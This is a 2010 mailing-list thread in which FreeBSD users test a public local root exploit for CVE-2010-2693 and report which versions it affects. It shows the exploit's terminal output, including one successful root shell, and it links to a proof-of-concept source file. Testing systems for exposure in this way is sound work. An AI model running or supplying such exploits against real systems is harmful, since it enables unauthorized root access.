On Sun, August 22, 2010 11:46, Leandro Keffer wrote:
> Tested on an 8.0 branch 3 and it works : (
>
> FreeBSD fbsd80.keffer.local 8.0-RELEASE-p3 FreeBSD 8.0-RELEASE-p3 #0: Tue
> May 25 20:54:11 UTC 2010
> [email protected]:/usr/obj/usr/src/sys/GENERIC
> amd64
>
> [kef...@fbsd80 /usr/home/keffer]$ ./cve-2010-2693
> [+] checking for setuid /usr/bin/su binary...
> [+] checking for suitable libc library in /lib...
> [+] found libc at /lib/libc.so.7
> [+] found getuid function at 0x00056990
> [+] target: 0x00056990, adjusted: 0x00056190, writes: 1377
> [+] spawning listener thread...
> [+] connecting to listener thread...
> [+] initiating exploit via sendfile...
> [+] exploit complete!
> [+] spawning root shell...
> fbsd80# id
> uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)

Here it doesn't seem to work, and it even asks for a password at the end ... (from su)

[math...@lamneth /usr/home/matheus/temp/exploits]$ ./cve-2010-2693
[+] checking for setuid /usr/bin/su binary...
[+] checking for suitable libc library in /lib...
[+] found libc at /lib/libc.so.6
[+] found getuid function at 0x0005a168
[+] target: 0x0005a168, adjusted: 0x00059968, writes: 1433
[+] spawning listener thread...
[+] connecting to listener thread...
[+] initiating exploit via sendfile...
[+] exploit complete!
[+] spawning root shell...
Password:
su: Sorry

[math...@lamneth /usr/home/matheus/temp/exploits]$ ./cve-2010-2693
[+] checking for setuid /usr/bin/su binary...
[+] checking for suitable libc library in /lib...
[+] found libc at /lib/libc.so.6
[+] found getuid function at 0x0005a168
[+] target: 0x0005a168, adjusted: 0x00059968, writes: 1433
[+] spawning listener thread...
[-] couldn't bind to listener socket

FreeBSD lamneth 8.0-BETA3 FreeBSD 8.0-BETA3 #0: Thu Aug 27 01:06:32 BRT 2009 r...@lamneth:/usr/obj/usr/home/matheus/public_html/FreeBSD/csup/CURRENT/src/sys/Lamneth8 i386

curious :)

matheus

> On August 21, 2010 11:44, Anderson Eduardo
> <[email protected]> wrote:
>
>> On 21/8/2010 11:42, Nilson wrote:
>> > On August 21, 2010 11:17, Leandro Keffer<[email protected]> wrote:
>> >> Does it also hit 8.0 with the latest branch ??
>> >> Anyone willing to test ?? I have no access to free servers at the
>> >> moment
>> >>
>> >> See you later, folks
>> >>
>> >
>> > I just tested on an 8.0-RELEASE-p2 and it worked; on 8.1-STABLE
>> > (cvsup'd last week) it did not work.
>> >
>> >
>> > -
>> > Nilson
>> > -------------------------
>> > Archive: http://www.fug.com.br/historico/html/freebsd/
>> > Leave the list: https://www.fug.com.br/mailman/listinfo/freebsd
>>
>> Another PoC - http://jon.oberheide.org/files/cve-2010-2693.c
>>
>> This one is better.

--
We will call you cygnus,
The God of balance you shall be

A: Because it messes up the order in which people normally read text.
Q: Why is top-posting such a bad thing?

http://en.wikipedia.org/wiki/Posting_style

